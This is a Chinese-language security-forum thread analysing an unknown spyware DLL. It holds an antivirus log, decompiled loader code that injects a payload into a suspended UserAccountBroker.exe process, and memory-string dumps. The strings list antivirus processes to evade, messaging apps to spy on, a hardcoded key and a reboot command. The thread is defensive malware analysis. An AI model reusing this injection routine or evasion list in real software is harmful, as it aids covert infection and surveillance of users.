未知Spyware #FakeAPP 1X

显示全部楼层 · 发表于 2025-10-19 13:06:40

冰盾

显示全部楼层 · 发表于 2025-10-19 13:07:50

emsisoft断网+关实时监控
2025/10/19 13:05:47
行为监控检测可疑行为 "AutorunCreation" 来自于 C:\Users\Administrator\AppData\Roaming\Embarcadero\AutoRecoverDat.dll (SHA1: F9C895C9DB13B38C840B8A1EADF0F9E8B8B48270)

2025/10/19 13:05:47
通知： "在以下程序中发现了可疑行为： C:\Users\Administrator\AppData\Roaming\Embarcadero\AutoRecoverDat.dll" .

2025/10/19 13:06:08
用户 "DESKTOP-23FPJTB\Administrator" 点击 "好的"

显示全部楼层 · 发表于 2025-10-19 15:32:30

这Shellcode，一眼顶真：

C:\Users\PC\AppData\Local\Profiler.json

__int64 __fastcall sub_18C77(__int64 a1, char a2)
{
int i; // [rsp+50h] [rbp-358h]
int j; // [rsp+54h] [rbp-354h]
int k; // [rsp+58h] [rbp-350h]
unsigned int v6; // [rsp+5Ch] [rbp-34Ch]
__int64 v7; // [rsp+60h] [rbp-348h]
char v8[16]; // [rsp+68h] [rbp-340h] BYREF
char v9[16]; // [rsp+78h] [rbp-330h] BYREF
char v10[8]; // [rsp+88h] [rbp-320h] BYREF
char v11[48]; // [rsp+90h] [rbp-318h] BYREF
__int64 v12; // [rsp+C0h] [rbp-2E8h]
__int64 v13; // [rsp+C8h] [rbp-2E0h]
__int64 v14[3]; // [rsp+D0h] [rbp-2D8h] BYREF
int v15; // [rsp+E8h] [rbp-2C0h] BYREF
__int64 v16; // [rsp+F0h] [rbp-2B8h] BYREF
__int64 v17; // [rsp+F8h] [rbp-2B0h]
__int64 v18; // [rsp+100h] [rbp-2A8h] BYREF
int v19[28]; // [rsp+110h] [rbp-298h] BYREF
char v20[272]; // [rsp+180h] [rbp-228h] BYREF
char v21[280]; // [rsp+290h] [rbp-118h] BYREF
memset(v21, 0, 0x104ui64);
strcpy(v10, "APPDATA");
(*(void (__fastcall **)(char *, char *, __int64))(a1 + 64))(v10, v21, 260i64);
memset(v20, 0, 0x104ui64);
for ( i = 0; v21[i]; ++i )
v20[i] = v21[i];
if ( a2 )
{
strcpy(v9, "\\GPUCache2.xml");
for ( j = 0; v9[j]; ++j )
v20[j + i] = v9[j];
v20[j + i] = 0;
}
else
{
strcpy(v8, "\\GPUCache.xml");
for ( k = 0; v8[k]; ++k )
v20[k + i] = v8[k];
v20[k + i] = 0;
}
v12 = (*(__int64 (__fastcall **)(char *, __int64, __int64, _QWORD, int, int, _QWORD))(a1 + 40))(
v20,
0x80000000i64,
1i64,
0i64,
3,
128,
0i64);
if ( v12 == -1 )
return 0i64;
v6 = (*(__int64 (__fastcall **)(__int64, _QWORD))(a1 + 48))(v12, 0i64);
if ( v6
&& (v7 = (*(__int64 (__fastcall **)(_QWORD, _QWORD, __int64, __int64))(a1 + 24))(0i64, v6, 12288i64, 4i64)) != 0 )
{
v15 = 0;
if ( (*(unsigned int (__fastcall **)(__int64, __int64, _QWORD, int *, _QWORD))(a1 + 56))(v12, v7, v6, &v15, 0i64) )
{
(*(void (__fastcall **)(__int64))(a1 + 120))(v12);
v16 = 0i64;
(*(void (__fastcall **)(__int64 *))(a1 + 128))(&v16);
strcpy(v11, "C:\\Windows\\SysWOW64\\UserAccountBroker.exe");
memset(v19, 0, 0x68ui64);
v19[0] = 104;
memset(v14, 0, sizeof(v14));
if ( (*(unsigned int (__fastcall **)(char *, _QWORD, _QWORD, _QWORD, _DWORD, int, _QWORD, _QWORD, int *, __int64 *))(a1 + 72))(
v11,
0i64,
0i64,
0i64,
0,
4,
0i64,
0i64,
v19,
v14) )
{
(*(void (__fastcall **)(__int64))(a1 + 136))(v16);
v13 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, int))(a1 + 80))(
v14[0],
0i64,
v6,
12288i64,
64);
if ( v13 )
{
v18 = 0i64;
if ( (*(unsigned int (__fastcall **)(__int64, __int64, __int64, _QWORD, __int64 *))(a1 + 104))(
v14[0],
v13,
v7,
v6,
&v18)
&& (v17 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))(a1 + 96))(
v14[0],
0i64,
0i64,
v13,
0i64,
0,
0i64)) != 0 )
{
(*(void (__fastcall **)(__int64))(a1 + 112))(v14[1]);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
(*(void (__fastcall **)(__int64))(a1 + 120))(v17);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
return 1i64;
}
else
{
(*(void (__fastcall **)(__int64, __int64, _QWORD, __int64))(a1 + 88))(v14[0], v13, 0i64, 0x8000i64);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64))(a1 + 136))(v16);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
(*(void (__fastcall **)(__int64))(a1 + 120))(v12);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64))(a1 + 120))(v12);
return 0i64;
}
}

复制代码

C:\Users\PC\AppData\Roaming\Embarcadero\GPUCache.xml

__int64 __fastcall sub_3044F(__int64 a1, char a2)
{
int i; // [rsp+50h] [rbp-358h]
int j; // [rsp+54h] [rbp-354h]
int k; // [rsp+58h] [rbp-350h]
unsigned int v6; // [rsp+5Ch] [rbp-34Ch]
__int64 v7; // [rsp+60h] [rbp-348h]
char v8[16]; // [rsp+68h] [rbp-340h] BYREF
char v9[16]; // [rsp+78h] [rbp-330h] BYREF
char v10[8]; // [rsp+88h] [rbp-320h] BYREF
char v11[48]; // [rsp+90h] [rbp-318h] BYREF
__int64 v12; // [rsp+C0h] [rbp-2E8h]
__int64 v13; // [rsp+C8h] [rbp-2E0h]
__int64 v14[3]; // [rsp+D0h] [rbp-2D8h] BYREF
int v15; // [rsp+E8h] [rbp-2C0h] BYREF
__int64 v16; // [rsp+F0h] [rbp-2B8h] BYREF
__int64 v17; // [rsp+F8h] [rbp-2B0h]
__int64 v18; // [rsp+100h] [rbp-2A8h] BYREF
int v19[28]; // [rsp+110h] [rbp-298h] BYREF
char v20[272]; // [rsp+180h] [rbp-228h] BYREF
char v21[280]; // [rsp+290h] [rbp-118h] BYREF
memset(v21, 0, 0x104ui64);
strcpy(v10, "APPDATA");
(*(void (__fastcall **)(char *, char *, __int64))(a1 + 64))(v10, v21, 260i64);
memset(v20, 0, 0x104ui64);
for ( i = 0; v21[i]; ++i )
v20[i] = v21[i];
if ( a2 )
{
strcpy(v9, "\\config2.ini");
for ( j = 0; v9[j]; ++j )
v20[j + i] = v9[j];
v20[j + i] = 0;
}
else
{
strcpy(v8, "\\config.ini");
for ( k = 0; v8[k]; ++k )
v20[k + i] = v8[k];
v20[k + i] = 0;
}
v12 = (*(__int64 (__fastcall **)(char *, __int64, __int64, _QWORD, int, int, _QWORD))(a1 + 40))(
v20,
0x80000000i64,
1i64,
0i64,
3,
128,
0i64);
if ( v12 == -1 )
return 0i64;
v6 = (*(__int64 (__fastcall **)(__int64, _QWORD))(a1 + 48))(v12, 0i64);
if ( v6
&& (v7 = (*(__int64 (__fastcall **)(_QWORD, _QWORD, __int64, __int64))(a1 + 24))(0i64, v6, 12288i64, 4i64)) != 0 )
{
v15 = 0;
if ( (*(unsigned int (__fastcall **)(__int64, __int64, _QWORD, int *, _QWORD))(a1 + 56))(v12, v7, v6, &v15, 0i64) )
{
(*(void (__fastcall **)(__int64))(a1 + 120))(v12);
v16 = 0i64;
(*(void (__fastcall **)(__int64 *))(a1 + 128))(&v16);
strcpy(v11, "C:\\Windows\\SysWOW64\\UserAccountBroker.exe");
memset(v19, 0, 0x68ui64);
v19[0] = 104;
memset(v14, 0, sizeof(v14));
if ( (*(unsigned int (__fastcall **)(char *, _QWORD, _QWORD, _QWORD, _DWORD, int, _QWORD, _QWORD, int *, __int64 *))(a1 + 72))(
v11,
0i64,
0i64,
0i64,
0,
4,
0i64,
0i64,
v19,
v14) )
{
(*(void (__fastcall **)(__int64))(a1 + 136))(v16);
v13 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, int))(a1 + 80))(
v14[0],
0i64,
v6,
12288i64,
64);
if ( v13 )
{
v18 = 0i64;
if ( (*(unsigned int (__fastcall **)(__int64, __int64, __int64, _QWORD, __int64 *))(a1 + 104))(
v14[0],
v13,
v7,
v6,
&v18)
&& (v17 = (*(__int64 (__fastcall **)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))(a1 + 96))(
v14[0],
0i64,
0i64,
v13,
0i64,
0,
0i64)) != 0 )
{
(*(void (__fastcall **)(__int64))(a1 + 112))(v14[1]);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
(*(void (__fastcall **)(__int64))(a1 + 120))(v17);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
return 1i64;
}
else
{
(*(void (__fastcall **)(__int64, __int64, _QWORD, __int64))(a1 + 88))(v14[0], v13, 0i64, 0x8000i64);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[0]);
(*(void (__fastcall **)(__int64))(a1 + 120))(v14[1]);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64))(a1 + 136))(v16);
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64, _QWORD, __int64))(a1 + 32))(v7, 0i64, 0x8000i64);
(*(void (__fastcall **)(__int64))(a1 + 120))(v12);
return 0i64;
}
}
else
{
(*(void (__fastcall **)(__int64))(a1 + 120))(v12);
return 0i64;
}
}

复制代码

显示全部楼层 · 发表于 2025-10-19 15:45:08

wwwab 发表于 2025-10-19 15:32
这Shellcode，一眼顶真：

C:%users\PC\AppData\Local\Profiler.json

但是我依然没看出来它最后的spy/rat是什么家族

只能写未知了

显示全部楼层 · 发表于 2025-10-19 16:26:26

神龟Turmi 发表于 2025-10-19 15:45
但是我依然没看出来它最后的spy/rat是什么家族
只能写未知了

dll用Enigma(5.X)加壳了，不好分析
一堆空名区段，应该容易被kill

regsvr32加载dll，发生联网行为之后，进程内存下的字符串，挑了一些有意思的部分：

[UNICODE] 0x000067d4: YourSharedSecretKey
[UNICODE] 0x000067fc: Unknow
[UNICODE] 0x00006810: %08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X
[UNICODE] 0x00006874: NULL
[UNICODE] 0x00006880: 0 min
[UNICODE] 0x0000688c: %d min
[UNICODE] 0x0000689c: FormatError
[UNICODE] 0x000068b4: %04u-%02u-%02u %02u:%02u
[UNICODE] 0x000068e8: error -- --
[UNICODE] 0x00006900: SeDebugPrivilege
[UNICODE] 0x00006924: FIRSTRUNTIME
[UNICODE] 0x00006940: MicrosoftUser
[UNICODE] 0x0000695c: IMPORT
[UNICODE] 0x0000696c: #000000
[UNICODE] 0x0000697c: IMPORTCOLOR
[UNICODE] 0x0000699c: Group
[UNICODE] 0x000069b0: Source
[UNICODE] 0x000069c0: USERGUID
[UNICODE] 0x000069d4: Note
[UNICODE] 0x000069e0: USER_RET_LOGIN
[UNICODE] 0x00006a00: 0x64
[UNICODE] 0x00006a0c: 0x86
[UNICODE] 0x00006a18: telegram.exe
[UNICODE] 0x00006a34: whatsapp.exe
[UNICODE] 0x00006a50: wechat.exe
[UNICODE] 0x00006a68: USER_RET_OPERACTION
[UNICODE] 0x00006a90: USER_RET_UPDATE_INFO
[UNICODE] 0x00006af4: 琠潯氠湯g
[UNICODE] 0x00006b00: Hips Software
[UNICODE] 0x00006b1c: HipsTray.exe
[UNICODE] 0x00006b38: Windows Defender
[UNICODE] 0x00006b5c: SecurityHealthSystray.exe
[UNICODE] 0x00006b90: MsMpEng.exe
[UNICODE] 0x00006ba8: NisSrv.exe
[UNICODE] 0x00006bc0: MsSense.exe
[UNICODE] 0x00006bd8: MRT.exe
[UNICODE] 0x00006be8: SenseNdr.exe
[UNICODE] 0x00006c04: MpCmdRun.exe
[UNICODE] 0x00006c20: MsASCui.exe
[UNICODE] 0x00006c38: WdBoot.exe
[UNICODE] 0x00006c50: WdMpService.exe
[UNICODE] 0x00006c70: WdNisSvc.exe
[UNICODE] 0x00006c8c: QiAnXin 360
[UNICODE] 0x00006ca4: 360Tray.exe
[UNICODE] 0x00006cbc: 360Safe.exe
[UNICODE] 0x00006cd4: 360rps.exe
[UNICODE] 0x00006cec: 360sd.exe
[UNICODE] 0x00006d00: QaxProcessManager.exe
[UNICODE] 0x00006d34: kxetray.exe
[UNICODE] 0x00006d4c: Tencent PC Manager
[UNICODE] 0x00006d74: QQPCTray.exe
[UNICODE] 0x00006d90: QQPCRt.exe
[UNICODE] 0x00006da8: QQPCMgr.exe
[UNICODE] 0x00006dc0: TenSafe.exe
[UNICODE] 0x00006dd8: Kaspersky
[UNICODE] 0x00006dec: avp.exe
[UNICODE] 0x00006dfc: kav.exe
[UNICODE] 0x00006e0c: kis.exe
[UNICODE] 0x00006e1c: AYAGENT
[UNICODE] 0x00006e2c: AYAgent.exe
[UNICODE] 0x00006e4c: v3l4sp.exe
[UNICODE] 0x00006e64: LINE
[UNICODE] 0x00006e70: LINE.exe
[UNICODE] 0x00006e84: WhatsApp
[UNICODE] 0x00006e98: WhatsApp.exe
[UNICODE] 0x00006eb4: Telegram
[UNICODE] 0x00006ec8: Telegram.exe
[UNICODE] 0x00006eec: shutdown.exe
[UNICODE] 0x00006f08: open
[UNICODE] 0x00006f1c: -r -t 0

复制代码

[UNICODE] 0x00080058: %SystemRoot%\system32\napinsp.dll
[UNICODE] 0x00080198: vSockets STREAM
[UNICODE] 0x000814d2: 扡摣晥桧橩汫湭灯牱瑳癵硷穹
[UNICODE] 0x000814fe: 乍偏剑呓噕塗婙
[UNICODE] 0x00081a3c: \device\harddiskvolume3\users\pc\appdata\roaming\embarcadero\activitylog.xml
[UNICODE] 0x00081e7e: 言协垳櫕E也T
[UNICODE] 0x000824f8: 尺獕牥屳畐汢捩
[UNICODE] 0x0008253c: 潃獮汯e
[UNICODE] 0x000825fc: 尺楗摮睯s
[UNICODE] 0x00082638: 尺楗摮睯s
[UNICODE] 0x000826ce: 踀epmapper
[UNICODE] 0x0008283c: 尺楗摮睯s
[UNICODE] 0x00082878: 尺獕牥屳畐汢捩
[UNICODE] 0x0008299c: 潃獮汯e
[UNICODE] 0x00082a58: 尺楗摮睯s
[UNICODE] 0x00082f06: 踀C:\Windows\SysWOW64\taskschd.dll
[UNICODE] 0x00082fa6: 蠀avp.exe
[UNICODE] 0x00082fc0: kav.exe
[UNICODE] 0x00082fd8: kis.exe
[UNICODE] 0x000831d6: 踀C:\Windows\SysWOW64\taskschd.dll
[UNICODE] 0x000833b6: 踀C:\Windows\System32\taskschd.dll
[UNICODE] 0x00083456: 言C:\Windows\System32\fwpuclnt.dll
[UNICODE] 0x000836d6: 谀C:\Windows\System32\CRYPTBASE.dll
[UNICODE] 0x000838b6: 踀C:\Windows\SysWOW64\taskschd.dll
[UNICODE] 0x0008432c: CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
[UNICODE] 0x00084404: \device\harddiskvolume3\users\pc\appdata\roaming\embarcadero\activitylog.xml
[UNICODE] 0x000845dc: \device\harddiskvolume3\users\pc\appdata\roaming\embarcadero\activitylog.xml
[UNICODE] 0x00085aaa: 扡摣晥桧橩汫湭灯牱瑳癵硷穹
[UNICODE] 0x00085ad6: 乍偏剑呓噕塗婙
[UNICODE] 0x00085d60: AYAGENT
[UNICODE] 0x00085e94: C:\Windows\Registration\R000000000006.clb
[UNICODE] 0x00086440: C:\Windows\Registration\R000000000006.clb
[UNICODE] 0x000866d4: CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
[UNICODE] 0x000867d4: 1耀@%SystemRoot%\System32\winrnr.dll,-1000
[UNICODE] 0x00086886: 耀-73e6154572dd}\TreatAs
[UNICODE] 0x000869e6: 耀@%SystemRoot%\system32\nlasvc.dll,-1000
[UNICODE] 0x00086b46: 耀@%SystemRoot%\system32\nlasvc.dll,-1000
[UNICODE] 0x00086e06: 耀@%SystemRoot%\system32\nlasvc.dll,-1000
[UNICODE] 0x00086e70: C:\Windows\system32\mswsock.dll
[UNICODE] 0x00086f66: 耀\RPC Control\LRPC-2c3441683ca9470570
[UNICODE] 0x0008727e: 耀@%SystemRoot%\System32\winrnr.dll,-1000
[UNICODE] 0x0008732e: 耀MicrosoftEdge_X64_141.0.3537.85.exe
[UNICODE] 0x00087386: 耀microsoftedge_x64_141.0.3537.85.exe
[UNICODE] 0x000873de: 耀MicrosoftEdge_X64_141.0.3537.85.exe
[UNICODE] 0x00087436: 蠀@%SystemRoot%\System32\winrnr.dll,-1000
[UNICODE] 0x0008748e: 耀microsoftedge_x64_141.0.3537.85.exe
[UNICODE] 0x000874e6: 耀microsoftedge_x64_141.0.3537.85.exe
[UNICODE] 0x0008753e: 耀microsoftedge_x64_141.0.3537.85.exe
[UNICODE] 0x00087596: 蠀A0886BCD-A0EE-42C5-B0B1-326A783A07BC
[UNICODE] 0x000875ee: 耀microsoftedge_x64_141.0.3537.85.exe
[UNICODE] 0x00087646: 耀microsoftedge_x64_141.0.3537.85.exe
[UNICODE] 0x0008769e: 耀MicrosoftEdge_X64_141.0.3537.85.exe
[UNICODE] 0x0008774e: 蠀@%SystemRoot%\system32\nlasvc.dll,-1000
[UNICODE] 0x00087838: @%SystemRoot%\System32\mswsock.dll,-60100
[UNICODE] 0x00087a3c: %SystemRoot%\system32\mswsock.dll
[UNICODE] 0x000885b8: UTF-16
[UNICODE] 0x000886f6: 耀Memory Compression
[UNICODE] 0x00088740: regsvr32.exe
[UNICODE] 0x0008879e: 蠀Windows Defender
[UNICODE] 0x000887e8: WS2_32.dll
[UNICODE] 0x000888bc: \device\ksecdd
[UNICODE] 0x000888ee: 蠀Tencent PC Manager
[UNICODE] 0x000889e0: LINE
[UNICODE] 0x00088a3e: 蠀Windows Defender
[UNICODE] 0x00088a62: ckets
[UNICODE] 0x00088af8: AYAGENT
[UNICODE] 0x00088b66: erviceClassInfo
[UNICODE] 0x00088bcc: harddiskvolume3
[UNICODE] 0x00088bec: Info
[UNICODE] 0x00088bfe: 蠀QaxProcessManager.exe
[UNICODE] 0x00088cde: 蠀Tencent PC Manager
[UNICODE] 0x00088d16: 耀runtimebroker.exe
[UNICODE] 0x00088d3c: t.exe
[UNICODE] 0x00088d86: 耀RuntimeBroker.exe
[UNICODE] 0x00088dac: t.exe
[UNICODE] 0x000893d0: 1,"H5
[UNICODE] 0x00089648: 麋诌aredSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedS麽诇retKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKe
[UNICODE] 0x00089bf2: %*3eQ?
[UNICODE] 0x00089cea: eyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourSharedSecretKeyYourShAredSe
[UNICODE] 0x0008c158: vSockets STREAM
[UNICODE] 0x0008c35c: %windir%\system32\vsocklib.dll
[UNICODE] 0x0008c5a8: %SystemRoot%\system32\pnrpnsp.dll
[UNICODE] 0x0008c7f8: %SystemRoot%\system32\wshbth.dll
[UNICODE] 0x0008ca46: 菝%SystemRoot%\system32\NLAapi.dll
[UNICODE] 0x0008cc98: %SystemRoot%\System32\mswsock.dll
[UNICODE] 0x0008cee8: %SystemRoot%\System32\winrnr.dll

复制代码

有窗口记录。。

[ANSI] 0x0000b4c8: telegram.exe
[ANSI] 0x0000b4e0: DingTalk.exe
[ANSI] 0x0000b540: telegram.exe
[ANSI] 0x0000b5e8: telegram.exe
[ANSI] 0x0000b600: DingTalk.exe
[ANSI] 0x0000b618: Telegram.exe
[ANSI] 0x0000b630: WhatsApp.exes
[ANSI] 0x0000b660: Telegram.exe
[ANSI] 0x0000b6f0: telegram.exes
[ANSI] 0x0000b708: WhatsApp.exes
[ANSI] 0x0000b768: DingTalk.exes
[ANSI] 0x0000b780: DingTalk.exes
[ANSI] 0x0000b7b0: Telegram.exe
[ANSI] 0x0000b7e0: DingTalk.exe
[ANSI] 0x0000b828: DingTalk.exe
[ANSI] 0x0000b858: DingTalk.exe
[UNICODE] 0x00000dd4: \device\harddiskvolume3\windows\system32\cryptbase.dll
[UNICODE] 0x00001104: \device\harddiskvolume3\windows\system32\cryptbase.dll
[UNICODE] 0x0000118c: \device\harddiskvolume3\windows\system32\cryptbase.dll
[UNICODE] 0x00001214: \device\harddiskvolume3\windows\system32\cryptbase.dll
[UNICODE] 0x000016dc: \device\harddiskvolume3\windows\system32\cryptbase.dll
[UNICODE] 0x00001764: \device\harddiskvolume3\windows\system32\cryptbase.dll
[UNICODE] 0x00001a94: \device\harddiskvolume3\Windows\SysWOW64\CRYPTBASE.dll
[UNICODE] 0x00001b1c: \device\harddiskvolume3\Windows\System32\CRYPTBASE.dll
[UNICODE] 0x00002d4c: C耀360Tray.exe
[UNICODE] 0x00002d76: 耀kxetray.exe
[UNICODE] 0x00002d9e: 耀QQPCRt.exe
[UNICODE] 0x00002dc6: 耀360rps.exe
[UNICODE] 0x00002dee: 耀360sd.exe
[UNICODE] 0x00002e04: ming
[UNICODE] 0x00002e16: 耀kxetray.exe
[UNICODE] 0x00002e3e: 耀QQPCRt.exe
[UNICODE] 0x00002e66: 耀TenSafe.exe
[UNICODE] 0x00002e8e: 耀Kaspersky
[UNICODE] 0x00002eb6: 耀AYAgent.exe
[UNICODE] 0x00002ede: 耀WdMpService.exe
[UNICODE] 0x00002f06: 蠀MsSense.exe
[UNICODE] 0x00002f2e: 蠀Hips Software
[UNICODE] 0x00002f56: 耀QQPCTray.exe
[UNICODE] 0x00002f7e: 耀QiAnXin 360
[UNICODE] 0x00002fa6: 耀TenSafe.exe
[UNICODE] 0x00002fce: 耀v3l4sp.exe
[UNICODE] 0x00002ff6: 蠀SenseNdr.exe
[UNICODE] 0x0000301e: 耀WdNisSvc.exe
[UNICODE] 0x00003046: 耀v3l4sp.exe
[UNICODE] 0x0000306e: 耀QQPCMgr.exe
[UNICODE] 0x00003096: 耀AYAgent.exe
[UNICODE] 0x000030be: 蠀NisSrv.exe
[UNICODE] 0x000030e6: 耀360Safe.exe
[UNICODE] 0x0000310e: 耀QQPCMgr.exe
[UNICODE] 0x00003136: 蠀HipsTray.exe
[UNICODE] 0x0000315e: 耀QQPCTray.exe
[UNICODE] 0x00003186: 耀360sd.exe
[UNICODE] 0x000031ae: 蠀MsMpEng.exe
[UNICODE] 0x000031d6: 耀360rps.exe
[UNICODE] 0x000031fe: 耀360Tray.exe
[UNICODE] 0x00003226: 耀360Safe.exe
[UNICODE] 0x0000324e: 耀WdNisSvc.exe
[UNICODE] 0x00003276: 耀WdBoot.exe
[UNICODE] 0x0000329e: 耀NisSrv.exe
[UNICODE] 0x000032c6: 耀MsMpEng.exe
[UNICODE] 0x000032ee: 耀HipsTray.exe
[UNICODE] 0x00003316: 耀MsASCui.exe
[UNICODE] 0x0000333e: 耀SenseNdr.exe
[UNICODE] 0x00003366: 耀NisSrv.exe
[UNICODE] 0x0000338e: 耀WdMpService.exe
[UNICODE] 0x000033b6: 耀HipsTray.exe
[UNICODE] 0x000033de: 耀MpCmdRun.exe
[UNICODE] 0x00003406: 耀MpCmdRun.exe
[UNICODE] 0x0000342e: 耀MsSense.exe
[UNICODE] 0x00003456: 耀SenseNdr.exe
[UNICODE] 0x0000347e: 耀MsSense.exe
[UNICODE] 0x000034a6: 耀MsASCui.exe
[UNICODE] 0x000034ce: 耀WdBoot.exe
[UNICODE] 0x000034f6: 耀MsMpEng.exe
[UNICODE] 0x00003554: t蠀QiAnXin 360
[UNICODE] 0x0000357e: 蠀360Tray.exe
[UNICODE] 0x000035a6: 蠀360sd.exe
[UNICODE] 0x000035ce: 蠀QiAnXin 360
[UNICODE] 0x000035f6: 耀notepad.exe
[UNICODE] 0x0000361e: 蠀MpCmdRun.exe
[UNICODE] 0x00003646: 蠀360Safe.exe
[UNICODE] 0x0000366e: 蠀Kaspersky
[UNICODE] 0x00003696: 耀onedrive.exe
[UNICODE] 0x000036be: 蠀WhatsApp
[UNICODE] 0x000036e6: 蠀Telegram
[UNICODE] 0x0000370e: 耀notepad.exe
[UNICODE] 0x00003736: 蠀QQPCMgr.exe
[UNICODE] 0x0000375e: 蠀TenSafe.exe
[UNICODE] 0x00003786: 蠀Hips Software
[UNICODE] 0x000037ae: 蠀kxetray.exe
[UNICODE] 0x000037d6: 耀OneDrive.exe
[UNICODE] 0x000037fe: 蠀MsASCui.exe
[UNICODE] 0x00003826: 蠀360rps.exe
[UNICODE] 0x0000384e: 蠀Kaspersky
[UNICODE] 0x00003876: 耀dllhost.exe
[UNICODE] 0x0000389e: 耀svchost.exe
[UNICODE] 0x000038c6: 蠀LINE.exe
[UNICODE] 0x000038ee: 蠀WhatsApp.exe
[UNICODE] 0x00003916: 蠀WdMpService.exe
[UNICODE] 0x0000393e: 蠀WhatsApp
[UNICODE] 0x00003966: 蠀WdBoot.exe
[UNICODE] 0x0000398e: 蠀AYAgent.exe
[UNICODE] 0x000039b6: 蠀QQPCRt.exe
[UNICODE] 0x000039de: 蠀v3l4sp.exe
[UNICODE] 0x00003a06: 蠀WdNisSvc.exe
[UNICODE] 0x00003a2e: 蠀QQPCTray.exe
[UNICODE] 0x00003a56: 耀whatsapp.exe
[UNICODE] 0x00003a7e: 蠀Telegram
[UNICODE] 0x00003aa6: 耀telegram.exe
[UNICODE] 0x00003ace: 耀wechat.exe
[UNICODE] 0x00003af6: 耀line.exe
[UNICODE] 0x00003b1e: 耀telegram.exe
[UNICODE] 0x00003b46: 耀telegram.exe
[UNICODE] 0x00003b6e: 耀line.exe
[UNICODE] 0x00003b9c: device
[UNICODE] 0x00003baa: dero
[UNICODE] 0x00003bca: arcadero
[UNICODE] 0x00003bec: embarcadero
[UNICODE] 0x00003c0e: 蠀Telegram.exe
[UNICODE] 0x00003c36: 耀dllhost.exe
[UNICODE] 0x00003c64: embarcadero
[UNICODE] 0x00003c86: 耀telegram.exe
[UNICODE] 0x00003cd6: 耀notepad.exe
[UNICODE] 0x00003cfe: 耀onedrive.exe
[UNICODE] 0x00003f86: 尺楗摮睯s
[UNICODE] 0x00004ee8: _RET_LOGIN
[UNICODE] 0x00004f58: A0886BCD-A0EE-42C5-B0B1-326A783A07BC
[UNICODE] 0x00004fa8: Unknow
[UNICODE] 0x000051b0: 火绒安全分析工具
[UNICODE] 0x000053b8: 0 min
[UNICODE] 0x000054b8: DESKTOP-AACHFF8
[UNICODE] 0x000056b8: 0x64
[UNICODE] 0x00005c4c: #000000
[UNICODE] 0x00005c62: 2025-10-19 16:04
[UNICODE] 0x00005cc6: C:\Windows\SysWOW64\regsvr32.exe
[UNICODE] 0x0000acfe: 耀NYIRNWRG
[UNICODE] 0x0000ad5e: 耀NYIRNWRG
[UNICODE] 0x0000ad7e: 耀NYIRNWRG
[UNICODE] 0x0000ad9e: 耀NYIRNWRG
[UNICODE] 0x0000adde: 耀NYIRNWRG
[UNICODE] 0x0000adfe: 耀NYIRNWRG
[UNICODE] 0x0000ae5e: 耀NYIRNWRG
[UNICODE] 0x0000ae7e: 耀NYIRNWRG
[UNICODE] 0x0000ae9e: 耀r.exe
[UNICODE] 0x0000aebe: 耀NYIRNWRG
[UNICODE] 0x0000aefe: 耀NYIRNWRG
[UNICODE] 0x0000af3e: 耀NYIRNWRG
[UNICODE] 0x0000af5e: 耀NYIRNWRG
[UNICODE] 0x0000af7e: 耀NYIRNWRG
[UNICODE] 0x0000af9e: 耀NYIRNWRG
[UNICODE] 0x0000afbe: 耀exe
[UNICODE] 0x0000afde: 耀NYIRNWRG
[UNICODE] 0x0000b01e: 耀NYIRNWRG
[UNICODE] 0x0000b03e: 耀NYIRNWRG
[UNICODE] 0x0000b05e: 耀NYIRNWRG
[UNICODE] 0x0000b09e: 耀NYIRNWRG
[UNICODE] 0x0000b19e: 耀dexer.exe
[UNICODE] 0x0000b1de: 耀ession
[UNICODE] 0x0000b2be: 耀r.exe
[UNICODE] 0x0000b2cc: e.exe
[UNICODE] 0x0000b2fe: 耀r.exe
[UNICODE] 0x0000b39e: 耀ker.exe
[UNICODE] 0x0000b3de: 耀r.exe
[UNICODE] 0x0000b43e: 耀eworker.exe
[UNICODE] 0x0000b4c6: 耀整敬牧浡攮數
[UNICODE] 0x0000b4de: 耀楄杮慔歬攮數
[UNICODE] 0x0000b53e: 耀整敬牧浡攮數
[UNICODE] 0x0000b574: users
